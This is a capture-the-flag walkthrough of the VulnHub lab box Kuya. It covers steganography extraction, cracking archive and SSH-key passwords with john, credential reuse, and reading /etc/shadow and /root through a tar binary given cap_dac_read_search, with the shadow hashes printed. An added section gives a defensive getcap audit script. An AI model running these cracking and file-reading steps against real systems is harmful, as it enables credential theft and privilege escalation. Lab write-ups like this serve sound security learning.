KUYA
Target IP: 10.0.2.17 by sc00by

########## nmap scan: ##########

root@kali:~#
nmap -p- -sT -sV 10.0.2.17
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-09 12:08 EDT
Nmap scan report for 10.0.2.17
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:39:31:D7 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds

############### The web server: ###############

[~!~] I was greeted with a very simple page:
[~!~] Viewing the page source revealed the location of the spongebob image: /loot/image.jpeg

######### The loot: #########

[~!~] The web server folder /loot gave us 5 pictures: 1.jpg 2.jpg 3.jpg 4.jpg image.jpeg
[~!~] As there didn't seem to be many other avenues to take from here, I decided to run some steganalysis on the images.
root@kali:~/Documents/vulnhub/Kuya#
steghide extract -sf spongebob.jpeg
Enter passphrase: the file "robots.txt" does already exist. overwrite ? (y/n)
y
wrote extracted data to "robots.txt".
root@kali:~/Documents/vulnhub/Kuya#
cat robots.txt
1.jpg 2." 3." 4." 5." image.jpeg
[~!~] NOTE: I entered a blank password
[~!~] Here we see what looks like the site's 'robots.txt' file... interesting. Let's see what the other images hold.
root@kali:~/Documents/vulnhub/Kuya#
steghide extract -sf 1.jpg
Enter passphrase:
wrote extracted data to "secret.txt".
root@kali:~/Documents/vulnhub/Kuya#
steghide extract -sf 2.jpg
Enter passphrase:
wrote extracted data to "emb.txt".
root@kali:~/Documents/vulnhub/Kuya#
steghide extract -sf 3.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
root@kali:~/Documents/vulnhub/Kuya#
steghide extract -sf 4.jpg
Enter passphrase:
wrote extracted data to "loot.pcapng".
root@kali:~/Documents/vulnhub/Kuya#
[~!~] All but 3.jpg gave us some juicy looking files:
1.jpg => secret.txt
2.jpg => emb.txt
3.jpg => ACTUALLY PASSWORD PROTECTED
4.jpg => loot.pcapng

########### secret.txt: ###########

root@kali:~/Documents/vulnhub/Kuya#
cat secret.txt
WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=
[~!~] Looks like some base64
root@kali:~/Documents/vulnhub/Kuya#
cat secret.txt | base64 -d
You really thought it would be this easy ? Keep digging ! Lots of trolls to defeat.
[~!~] Lots of trolls to defeat...

######## emb.txt: ########

root@kali:~/Documents/vulnhub/Kuya#
cat emb.txt
+[--->++<]>+.++[->++++<]>+.+++++++..[++>---<]>--.++[->++<]>.[--->+<]>+++.-.---------. --[--->+<]>-.+.-.--[->+++<]>-.[->+++++++<]>.++++++.---.[-->+++++<]>+++.+++[->++<]>.[- ->+++<]>.+++++++++.+.+.[---->+<]>+++.+++[->++<]>.--[--->+<]>.-----------.++++++.-[--- >+<]>--.-[--->++<]>-.++++++++++.+[---->+<]>+++.>+[--->++<]>.>-[----->+<]>-.++[->++<]> ..----.-[--->++<]>+.-.--[++++>---<]>.-------------.-[--->+<]>+++.+[-->+<]>+++++.+.++[ ->+++++<]>.--.+[----->+<]>.--[++>---<]>.+[->++<]>.-[--->++<]>+.--.-[---->+++<]>-.
[~!~] It's...beautiful. This is actually a programming language called... Brainfuck. I had to decode it once before during the NCL Fall 2018 preseason.
Decoder: https://www.dcode.fr/brainfuck-language
Decoded: Well Done ! Your First Flag is
V2hhdCBpcyBCYWx1dCA/
[~!~] We found one flag! Woot woot. First flag:
V2hhdCBpcyBCYWx1dCA/

############ loot.pcapng: ############

root@kali:~/Documents/vulnhub/Kuya#
wireshark loot.pcapng
[~!~] There were only about 10 packets captured in this .pcapng. There was one interesting GET request that I noticed:
[~!~] To export 'loot.7z' to our filesystem do the following: File > Export Objects > HTTP > Save the file
[~!~] This was my first road bump; it took me a while to find the correct way to brute-force the password. Finally I found a john script (7z2john.pl) for producing the 7-Zip hash:
root@kali:~/Documents/vulnhub/Kuya#
perl 7z2john.pl loot.7z > loot.hash
root@kali:~/Documents/vulnhub/Kuya#
file loot.hash
loot.hash: ASCII text, with very long lines
[~!~] Now I passed the hash stored in loot.hash to john:
root@kali:~/Documents/vulnhub/Kuya#
john loot.hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 128/128 SSE2 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 1/3 (2019-04-09 16:11) 0g/s 10.78p/s 10.78c/s 10.78C/s loot.zloot5..loot.zz6
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
0g 0:00:03:14 1/3 (2019-04-09 16:14) 0g/s 7.429p/s 7.429c/s 7.429C/s Lloot.7z)..Loot*
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
0g 0:00:04:52 1/3 (2019-04-09 16:15) 0g/s 7.543p/s 7.543c/s 7.543C/s slloot..s7z
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
0g 0:00:12:27 1/3 (2019-04-09 16:23) 0g/s 7.963p/s 7.963c/s 7.963C/s Loot31..Loot.7z7z32
Almost done: Processing the remaining buffered candidate passwords, if any
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
manchester       (loot.7z)
1g 0:00:20:57 DONE 2/3 (2019-04-09 16:32) 0.000795g/s 8.303p/s 8.303c/s 8.303C/s 147258369..mommy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Documents/vulnhub/Kuya#
john --show loot.hash
loot.7z:manchester
1 password hash cracked, 0 left
[~!~] Now to extract...
root@kali:~/Documents/vulnhub/Kuya#
7za x loot.7z
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5 CPU 750 @ 2.67GHz (106E5),ASM)

Scanning the drive for archives:
1 file, 1976 bytes (2 KiB)

Extracting archive: loot.7z
--
Path = loot.7z
Type = 7z
Physical Size = 1976
Headers Size = 216
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1

Enter password (will not be echoed):
Everything is Ok

Folders: 1
Files: 2
Size:       2157
Compressed: 1976

#################### WHAT'S IN THE FILES? ####################

root@kali:~/Documents/vulnhub/Kuya#
cd loot
root@kali:~/Documents/vulnhub/Kuya/loot#
ls
id_rsa id_rsa.pub
root@kali:~/Documents/vulnhub/Kuya/loot#
file *
id_rsa:     PEM RSA private key
id_rsa.pub: OpenSSH RSA public key
[~!~] OH HEY look at that, ssh keys!
root@kali:~/Documents/vulnhub/Kuya/loot#
john id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hello            (id_rsa)
hello            (id_rsa)
Proceeding with incremental:ASCII
hello            (id_rsa)
3g 0:00:02:28 3/3 (2019-04-09 17:30) 0.02027g/s 1321Kp/s 1321Kc/s 1321KC/s gtc6az..gtc6bl
3g 0:00:10:25 3/3 (2019-04-09 17:38) 0.004793g/s 1360Kp/s 1360Kc/s 1360KC/s 10jon3n..10jo1bl
Session aborted
root@kali:~/Documents/vulnhub/Kuya/loot#
john --show id_rsa.hash
id_rsa:hello
1 password hash cracked, 0 left
[~!~] What an easy id_rsa passphrase:
'hello'
root@kali:~/Documents/vulnhub/Kuya/loot#
ssh -i id_rsa test@mini
Enter passphrase for key 'id_rsa':
Linux mini 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 18 01:33:12 2018 from 192.168.37.1
test@mini:~$

################### A Shell on the Box: ###################

test@mini:~$
cd .ssh
test@mini:~/.ssh$
ls
authorized_keys id_rsa id_rsa.pub
sshscript.sh
test@mini:~/.ssh$
cat sshscript.sh
#!/bin/bash
echo "FInally you got a shell ! Here's a flag for you 5256247262. Let's see where you go from here"
test@mini:~/.ssh$
[~!~] Our second flag! It looks like a telephone number, but who knows? Second flag:
5256247262
[~!~] Next, after lots of digging, I found my way to the web server directory and found the following WordPress config file:
/var/www/html/wordpress/wp-config-sample.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'kuya');

/** MySQL database password */
define('DB_PASSWORD', 'Chrepia##@@!!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
[~!~] Looks like we may have found some user creds?
test@mini:/var/www/html/wordpress$
su kuya
Password:
kuya@mini:/var/www/html/wordpress$
whoami
kuya
[~!~] Privesc #1 test -> kuya

######################### Exploring Kuya, the user: #########################

kuya@mini:/var/www/html/wordpress$
cd
kuya@mini:~$
ls
shadow.tar who_dis.txt
kuya@mini:~$
cat who_dis.txt
Well Done ! BTW this was too easy :D Here is something for you IL0v3C@f3HaV@nA
kuya@mini:~$
[~!~] Our third flag! Third flag:
IL0v3C@f3HaV@nA

############### Digging Around: ###############

[~!~] This took me a good chunk of time, but I realize now how important it is to check bash history.
kuya@mini:~$
history
    1  cd /home/kuya
    2  chown -R kuya
    3  chown -R kuya /home/kiya
    4  chown -R kuya /home/kuya
    5  su root
    6  cd /home/kuya
    7  cat /etc/shadow
    8  ./tar -cvf shadow.tar /etc/shadow
    9  tar -cvf shadow.tar /etc/shadow
   10  which tar
   11  getcap -r / 2>/dev/null
   12  setcap cap_dac_read_search=ep
   13  exit
[~!~] I had to do a bit of digging around with tar options to truly understand what was going on.
Reference: https://www.computerhope.com/unix/utar.htm
kuya@mini:~$
tar -cvf shadow.tar /etc/shadow
tar: Removing leading `/' from member names
/etc/shadow
[~!~] To be completely honest, I don't quite understand what happened here, but the leading / was removed, making it only etc/shadow, which should be accessible by us as the user kuya.
kuya@mini:~$
tar xvf shadow.tar
etc/shadow
kuya@mini:~$
ls
etc
shadow.tar who_dis.txt
kuya@mini:~$
cat etc/shadow
root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::
daemon:*:17863:0:99999:7:::
bin:*:17863:0:99999:7:::
sys:*:17863:0:99999:7:::
sync:*:17863:0:99999:7:::
games:*:17863:0:99999:7:::
man:*:17863:0:99999:7:::
lp:*:17863:0:99999:7:::
mail:*:17863:0:99999:7:::
news:*:17863:0:99999:7:::
uucp:*:17863:0:99999:7:::
proxy:*:17863:0:99999:7:::
www-data:*:17863:0:99999:7:::
backup:*:17863:0:99999:7:::
list:*:17863:0:99999:7:::
irc:*:17863:0:99999:7:::
gnats:*:17863:0:99999:7:::
nobody:*:17863:0:99999:7:::
systemd-timesync:*:17863:0:99999:7:::
systemd-network:*:17863:0:99999:7:::
systemd-resolve:*:17863:0:99999:7:::
systemd-bus-proxy:*:17863:0:99999:7:::
_apt:*:17863:0:99999:7:::
messagebus:*:17863:0:99999:7:::
sshd:*:17863:0:99999:7:::
kuya:$6$MpPRKfei$KvGUeoeKXHNg8iSzMHPST4vtIe3GbjAHAf2gtJijQciwLtaeBNMi0pHjx1BSetZB/au8x.yKF9SB.nLtW3WRT.:17863:0:99999:7:::
test:!:17865:0:99999:7:::
mysql:!:17867:0:99999:7:::
[~!~] If we can access any file we want with this perhaps we can snag any other location / file we want?
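For the record, the stripped leading slash only changes the member name stored inside the archive; it has nothing to do with why the read succeeded. The real reason is in the root bash history above: `getcap -r /` followed by `setcap cap_dac_read_search=ep` gave the tar binary the CAP_DAC_READ_SEARCH file capability, which lets a process bypass file read and directory search permission checks, so any user who can run that tar can read /etc/shadow or /root. That is exactly the kind of misconfiguration a host audit should catch. The following Python script is an added example (not from the writeup) that parses `getcap -r /` output, flags capabilities that grant file-permission bypass or identity changes, and reports anything unexpected. The risk classification, the small allow-list of binaries that normally carry a capability, and the sample getcap lines are all constructed for this example.

```python
"""Audit file capabilities reported by `getcap -r /`.
(Added example; not code from the original writeup.)"""
import re
import subprocess

# Capabilities whose presence on an arbitrary binary is a privilege-escalation
# risk.  This classification is the example's own, not an official list.
HIGH_RISK_CAPS = {
    "cap_dac_read_search": "bypasses read/search permission checks (reads /etc/shadow, /root, ...)",
    "cap_dac_override": "bypasses read, write and execute permission checks",
    "cap_setuid": "can switch to any uid, including root",
    "cap_setgid": "can switch to any gid",
    "cap_sys_admin": "broad administrative operations (mount, namespaces, ...)",
    "cap_sys_ptrace": "can inspect and control other processes",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses owner checks on mode/ownership changes",
    "cap_setfcap": "can grant file capabilities to other binaries",
}

# Binaries that commonly carry a file capability on Debian-style systems.
# A starting allow-list for the example; extend it from your own baseline.
EXPECTED_CAPS = {
    "/bin/ping": {"cap_net_raw"},
    "/usr/bin/ping": {"cap_net_raw"},
    "/usr/sbin/arping": {"cap_net_raw"},
}

# getcap prints one of two shapes depending on the libcap version:
#   /bin/tar = cap_dac_read_search+ep      (older libcap)
#   /bin/tar cap_dac_read_search=ep        (libcap 2.41 and later)
_GETCAP_LINE = re.compile(
    r"^(?P<path>/\S+)(?: = | )(?P<caps>[\w,]+)(?P<sep>[+=])(?P<flags>[eip]+)$"
)

# Constructed sample output used when getcap is not available (e.g. in tests).
SAMPLE_GETCAP = """\
/bin/ping = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/sbin/arping cap_net_raw=ep
not getcap output at all
"""


def parse_getcap_line(line):
    """Return (path, set_of_caps, flags) for one getcap line, or None if the
    line is not in either getcap format."""
    m = _GETCAP_LINE.match(line.strip())
    if not m:
        return None
    caps = {c.lower() for c in m.group("caps").split(",")}
    return m.group("path"), caps, m.group("flags")


def audit_getcap(output):
    """Classify each getcap line as 'high', 'review', 'ok' or 'unparsed'.

    Returns a list of (severity, path_or_line, explanation) tuples in input order.
    """
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        parsed = parse_getcap_line(line)
        if parsed is None:
            findings.append(("unparsed", line, "not in getcap format"))
            continue
        path, caps, flags = parsed
        risky = sorted(caps & HIGH_RISK_CAPS.keys())
        if risky:
            why = "; ".join(f"{c}: {HIGH_RISK_CAPS[c]}" for c in risky)
            # Without the 'e' flag the capability is only permitted; a binary that
            # is not capability-aware (like tar) never raises it itself, but it
            # still has no business being there.
            why += " [effective]" if "e" in flags else " [permitted only]"
            findings.append(("high", path, why))
        elif caps - EXPECTED_CAPS.get(path, set()):
            findings.append(("review", path, "unexpected capability set " + ",".join(sorted(caps))))
        else:
            findings.append(("ok", path, ",".join(sorted(caps))))
    return findings


def run_getcap():
    """Run `getcap -r /` (the same command seen in the box's root history) and
    audit its stdout; stderr noise from unreadable directories is discarded."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return audit_getcap(proc.stdout)


if __name__ == "__main__":
    try:
        findings = run_getcap()
    except FileNotFoundError:  # getcap not installed: show the constructed sample
        findings = audit_getcap(SAMPLE_GETCAP)
    for sev, path, why in findings:
        if sev != "ok":
            print(f"{sev:8} {path}: {why}")
```

On this box the script would report /bin/tar (or wherever `which tar` points) as high severity. The fix is to strip the capability with `setcap -r /bin/tar` and to find out who added it; a periodic `getcap -r /` compared against a known-good baseline is a cheap way to notice this class of backdoor, which leaves no SUID bit and no change in `ls -l` output.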
kuya@mini:~$
tar cvf shadow.tar /root
tar: Removing leading `/' from member names
/root/
/root/.nano/
/root/M3m3L0rd.txt
/root/.selected_editor
/root/.bash_history
kuya@mini:~$
tar xvf shadow.tar
root/
root/.nano/
root/M3m3L0rd.txt
root/.selected_editor
root/.bash_history
kuya@mini:~$
ls
etc
root
shadow.tar who_dis.txt
[~!~] The root directory!
kuya@mini:~$
cd root
kuya@mini:~/root$
ls
M3m3L0rd.txt
kuya@mini:~/root$
cat M3m3L0rd.txt
You did it !!!! COngratulations :D I just hope you had the same fun as I had while making this box. As this is my first box, please send in your reviews to me on syed.ashhad72@gmail.com (DOn't hack this please Mr Leet) If you are still reading, you are wasting your time THere is no flag here. Seriously Stop Well I can't help so here is the last one WeasleyIsOurKing #PeaceOut
kuya@mini:~/root$
[~!~] THAT'S A WIN! Final flag:
WeasleyIsOurKing
-sc00by